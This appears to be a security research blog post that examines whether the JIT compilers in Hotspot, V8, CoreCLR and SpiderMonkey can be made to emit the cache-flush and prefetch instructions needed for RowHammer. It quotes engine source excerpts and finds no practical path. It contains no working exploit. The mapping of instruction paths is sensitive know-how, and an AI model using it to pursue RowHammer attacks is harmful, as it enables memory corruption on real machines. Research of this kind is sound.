  The Java Hotspot Virtual Machine is a core component of the Java SE platform. It implements the Java Virtual Machine Specification. As the Java bytecode execution engine, it also includes dynamic compilers that adaptively compile Java bytecodes into optimized machine instructions. Hotspot is a stack-based virtual machine. The bytecodes are stored in the class file, which is the input to Hotspot and is user controllable. What we care about is whether we can craft a class file that makes Java Hotspot trigger RowHammer.
  When Java Hotspot runs Java bytecode, it continually analyzes the program’s performance for “hot spots”, the code that is executed frequently or repeatedly. The JIT compiler is used to compile this code.
  The default interpreter that comes with Hotspot is the so-called “Template Interpreter”. A second interpreter exists beside it: a C++ interpreter whose main interpreter loop is implemented in C++. The JIT compiler in Java Hotspot has three implementations: the client compiler (C1 Compiler), the server compiler (C2 Compiler) and the Shark Compiler (an LLVM-based compiler).


Figure 2.1

2.1.1 Interpreter trigger RowHammer?

a) The working mechanism of template interpreter

  The template interpreter is created at runtime from assembler templates that are translated into real machine code. It interprets a Java program bytecode by bytecode. When the interpreter fetches a new bytecode, the corresponding native machine code is called.
  In order to interpret the Java program, Java Hotspot generates many code stubs when it starts, such as StubRoutines::call_stub and StubRoutines::catch_exception. The command “java -XX:+PrintInterpreter” can be used to show the code stubs that may be called during interpretation.
  Notice that the native machine code stubs are fairly large. For example, the code size of “invokevirtual” is 352 bytes, and the code size of “putstatic” is 512 bytes.

b) Whether the interpreter can trigger RowHammer?

  Can we craft a class file that makes the interpreter generate the machine code we need to trigger RowHammer? After analysis, we could not find instructions such as prefetch, clflush and movnt* in the machine code generated by the interpreter. So we cannot use the template interpreter to trigger RowHammer.

2.1.2 JIT Compiler trigger RowHammer?

a) The working mechanism of C1 Compiler

  The C1 Compiler is a fast, lightly optimizing bytecode compiler. It performs some value numbering, inlining, and class analysis. It uses a simple CFG-oriented SSA “high” IR, a machine-oriented “low” IR, a linear scan register allocator, and a template-style code generator.
  The compiler is asynchronous: the “CompilerThread” thread in Hotspot compiles the methods that need to be compiled. The option “-XX:CompileThreshold=<n>” can be used to set the number of method invocations before compiling.

Figure 2.2

  In the Hotspot source code, the C1 Compiler has the following phases:

typedef enum {
  _t_compile,
  _t_setup,
  _t_optimizeIR,
  _t_buildIR,
  _t_emit_lir,
  _t_linearScan,
  _t_lirGeneration,
  _t_lir_schedule,
  _t_codeemit,
  _t_codeinstall,
  max_phase_timers
} TimerName;

As Figure 2.2 shows, the C1 Compiler works in the following steps:

1) Build HIR

  The C1 Compiler iterates over the Java bytecodes in the class file and translates them into a CFG (Control Flow Graph). The basic blocks of the CFG use SSA form to represent the instructions. HIR is a “high” IR, far from machine code.

2) Emit LIR

  The compiler iterates over the basic blocks in the CFG and over the instructions in each basic block, translating the HIR to LIR. LIR is a “low” IR, close to machine code.

3) Register allocation

  LIR uses many virtual registers. In this phase the compiler needs to allocate real registers. The C1 Compiler uses linear scan to allocate registers.

4) Machine code generation

  This is the phase that emits the real machine code. It iterates over the instructions in the LIR to generate the machine code. The compiler uses the LIR_Assembler class to do this job, as shown below:

LIR_Assembler lir_asm(this);
lir_asm.emit_code(hir()->code());

  The compiler iterates over the LIR list and invokes each instruction’s emit code. All instructions are subclasses of LIR_Op, so they all have an “emit_code” method.

op->emit_code(this);

  Take LIR_Op1 as an example. Its “emit_code” method is:

void LIR_Op1::emit_code(LIR_Assembler* masm) {    //emit_code
  masm->emit_op1(this);
}

  If the operation code of the LIR_Op1 is “lir_prefetchr”:

    case lir_prefetchr:
      prefetchr(op->in_opr());
      break;

  It then invokes the prefetchr function, which is platform-dependent. On x86, the code is in assembler_x86.cpp:

void Assembler::prefetchr(Address src) {
  assert(VM_Version::supports_3dnow_prefetch(), "must support");
  InstructionMark im(this);
  prefetch_prefix(src);
  emit_byte(0x0D);
  emit_operand(rax, src); // 0, src
}

  Finally, the compiler generates the real executable machine code.
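
  The dispatch chain above (a list of operations, a virtual emit_code call on each, and an assembler that appends bytes) can be mimicked with a toy model. The sketch below is not Hotspot code: ToyAssembler, ToyOp and the other names are hypothetical, and only the simplest addressing form is encoded, namely the 3DNow! prefetch with [rax] as its operand (bytes 0F 0D with a ModRM byte of 00), without any REX prefix handling.

```cpp
#include <cassert>
#include <cstdint>
#include <memory>
#include <vector>

// Toy stand-in for an assembler: it just collects emitted bytes.
class ToyAssembler {
public:
    void emit_byte(std::uint8_t b) { code_.push_back(b); }
    // prefetch [rax]: opcode 0F 0D /0, ModRM 0x00 (mod=00, reg=0, rm=rax).
    void prefetchr_rax() {
        emit_byte(0x0F);
        emit_byte(0x0D);
        emit_byte(0x00);
    }
    void nop() { emit_byte(0x90); }
    const std::vector<std::uint8_t>& code() const { return code_; }

private:
    std::vector<std::uint8_t> code_;
};

// Toy stand-in for a low-level IR operation with a virtual emit hook.
struct ToyOp {
    virtual ~ToyOp() = default;
    virtual void emit_code(ToyAssembler& masm) const = 0;
};

struct ToyPrefetchOp : ToyOp {
    void emit_code(ToyAssembler& masm) const override { masm.prefetchr_rax(); }
};

struct ToyNopOp : ToyOp {
    void emit_code(ToyAssembler& masm) const override { masm.nop(); }
};

// Walks the operation list and lets each operation emit its own bytes.
std::vector<std::uint8_t> emit_all(
    const std::vector<std::unique_ptr<ToyOp>>& ops) {
    ToyAssembler masm;
    for (const auto& op : ops) {
        assert(op != nullptr);
        op->emit_code(masm);
    }
    return masm.code();
}

// Builds a two-operation list (nop, prefetch) and emits it.
std::vector<std::uint8_t> emit_demo() {
    std::vector<std::unique_ptr<ToyOp>> ops;
    ops.push_back(std::unique_ptr<ToyOp>(new ToyNopOp));
    ops.push_back(std::unique_ptr<ToyOp>(new ToyPrefetchOp));
    return emit_all(ops);
}
```

  The point of the model is that a prefetch only appears in the output if a prefetch operation is already present in the list, which is why the question becomes how such an operation can get into the LIR in the first place.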

b) Whether the C1 Compiler can trigger RowHammer

  Can the C1 Compiler trigger RowHammer? We did find the prefetch instruction on x86, which gives us some hope of triggering RowHammer.
  Working from bottom to top: to get a prefetch instruction, we need a LIR_Op1 in the LIR whose operation code is lir_prefetchr or lir_prefetchw. To get that, the GraphBuilder::append_unsafe_prefetch function must be invoked while building the HIR. That function is called by the GraphBuilder::try_inline_intrinsics function. Finally, we found that invoking the prefetch* methods in sun.misc.Unsafe reaches this path. So Hotspot does support prefetch: it treats the Unsafe.prefetchRead() and Unsafe.prefetchWrite() methods as intrinsics, and these methods generate a prefetch instruction in the machine code. Unfortunately, sun.misc.Unsafe in rt.jar does not declare such methods, so we would have to modify rt.jar to reach this path. What a pity!

  In Hotspot we also find the CLFLUSH instruction. When Hotspot starts, it generates a code stub:

__ bind(flush_line);                         
__ clflush(Address(addr, 0));          //addr: address to flush 
__ addptr(addr, ICache::line_size);                                         
__ decrementl(lines);                   //lines: range to flush
__ jcc(Assembler::notZero, flush_line);

The code stub can be invoked in the last phase of C1 compiler.

// done
masm()->flush();             //invoke ICache flush  

It tries to flush the cache lines that hold the generated instructions.

void AbstractAssembler::flush() {
  sync();
  ICache::invalidate_range(addr_at(0), offset());
}

  Using this stub we can flush a range of addresses, but the address is not controllable, so we cannot flush the address we want. The compiler also spends a lot of time between flushes, so we cannot issue enough CLFLUSH instructions within 64ms.

c) Other Compiler

  The C2 Compiler is different from the C1 Compiler. It is a highly optimizing bytecode compiler whose optimizations include global value numbering, conditional constant type propagation, constant folding, global code motion and so on. We cannot make it generate prefetch, clflush or movnt* instructions directly.
  The Shark Compiler is based on LLVM. We ignore it because it is not the default compiler.

2.2 Chrome V8

  The V8 JavaScript Engine is an open source JavaScript engine developed by Google for the Chrome web browser. V8 compiles JavaScript to native machine code before executing it. V8 does not have an interpreter: it translates JavaScript to an AST (Abstract Syntax Tree), then walks the AST to generate machine code.
  After research, we did not find clflush or movnt* instructions in the code V8 generates when compiling JavaScript. We found a prefetch instruction in one function.
  The function that generates the prefetch is:

MemMoveFunction CreateMemMoveFunction() {

  __ prefetch(Operand(src, 0), 1);
  __ cmp(count, kSmallCopySize);    //kSmallCopySize=8
  __ j(below_equal, &small_size);  
  __ cmp(count, kMediumCopySize);   //kMediumCopySize=63
  __ j(below_equal, &medium_size);
  __ cmp(dst, src);
  __ j(above, &backward);

  This function is used to move memory, for example when the instruction buffer is not big enough to store the compiled code and V8 has to enlarge it. In that case the prefetch instruction is generated only once, so it cannot be used to trigger RowHammer.

2.3 .NET CoreCLR

  CoreCLR is the .NET Core Runtime. It includes RyuJIT, the .NET GC and many other components. RyuJIT is the JIT compiler in .NET CoreCLR. RyuJIT only defines some common x86 instructions (Figure 2.3), which do not include the instructions needed to trigger RowHammer.
  We found the prefetch instruction in the .NET GC component, as shown in Figure 2.4. Unfortunately, the prefetch is disabled by default (Figure 2.5).

Figure 2.3

void gc_heap::relocate_survivor_helper (BYTE* plug, BYTE* plug_end)
{
    BYTE*  x = plug;
    while (x < plug_end)
    {
        size_t s = size (x);
        BYTE* next_obj = x + Align (s);
        Prefetch (next_obj);
        relocate_obj_helper (x, s);
        assert (s > 0);
        x = next_obj;
    }
}

Figure 2.4

//#define PREFETCH
#ifdef PREFETCH
__declspec(naked) void __fastcall Prefetch(void* addr)
{
   __asm {
       PREFETCHT0 [ECX]
        ret
    };
}
#else //PREFETCH
inline void Prefetch (void* addr)
{
    UNREFERENCED_PARAMETER(addr);
}
#endif //PREFETCH

Figure 2.5

2.4 Firefox SpiderMonkey

  SpiderMonkey provides JavaScript support for Mozilla Firefox. We did not find the instructions needed to trigger RowHammer in it.

0x03 Conclusion

  The purpose of our research was to trigger RowHammer through script languages. To improve efficiency, most script languages have a JIT compiler. We analyzed Hotspot, Chrome V8, .NET CoreCLR and SpiderMonkey to verify our idea, but in the end we found it hard to get what we wanted.

1) Triggering RowHammer is not easy, because we only have 64ms. The number of irrelevant instructions must therefore be very small; otherwise the wordline does not toggle on and off often enough to trigger RowHammer.

2) The instructions we need are uncommon. The compilers do not generate them directly.

3) From the point of view of JIT compiler developers, a cross-platform JIT usually abstracts each instruction and implements it on every platform. More abstracted instructions mean much more code, so the set of abstracted instructions is kept as small as possible. In the source code we analyzed, only Hotspot abstracts the prefetch instruction. JIT compilers always try to avoid a large number of instruction definitions. (There are special cases where a script language uses a third-party JIT engine such as AsmJIT, which usually supports all instructions. But for now, most languages build their JIT independently.)

4) In our research, the instructions we need were always generated to assist the JIT compilation process, for example using prefetch to speed up data moves, or using clflush to flush the cache to make sure the generated code executes correctly. These instructions are not translated from the script directly, so RowHammer cannot be triggered because they are generated in small numbers and at low speed.
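
The 64ms constraint in point 1 can be made concrete with a small budget calculation. This is only a sketch: the per-iteration cost and the number of toggles required are hypothetical inputs supplied by the caller, not measurements from this research.

```cpp
#include <cassert>
#include <cstdint>

// 64 ms window from the text, expressed in nanoseconds.
constexpr std::uint64_t kRefreshWindowNs = 64ull * 1000 * 1000;

// How many hammer iterations fit in one window if every iteration,
// including any unrelated instructions around it, costs ns_per_iteration.
std::uint64_t iterations_per_window(std::uint64_t ns_per_iteration) {
    assert(ns_per_iteration > 0);
    return kRefreshWindowNs / ns_per_iteration;
}

// True when the loop reaches `required_toggles` within a single window.
// Both arguments are assumptions chosen by the caller.
bool fast_enough(std::uint64_t ns_per_iteration,
                 std::uint64_t required_toggles) {
    return iterations_per_window(ns_per_iteration) >= required_toggles;
}
```

For example, at an assumed 100 ns per iteration the loop gets 640,000 iterations per window. If unrelated JIT work raises the cost to 1,000 ns per iteration, only 64,000 iterations remain, a tenfold drop.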

Resources

  1. Google Project Zero
    http://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
  2. Paper: Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors
    http://users.ece.cmu.edu/~yoonguk/papers/kim-isca14.pdf
  3. Source code
]]>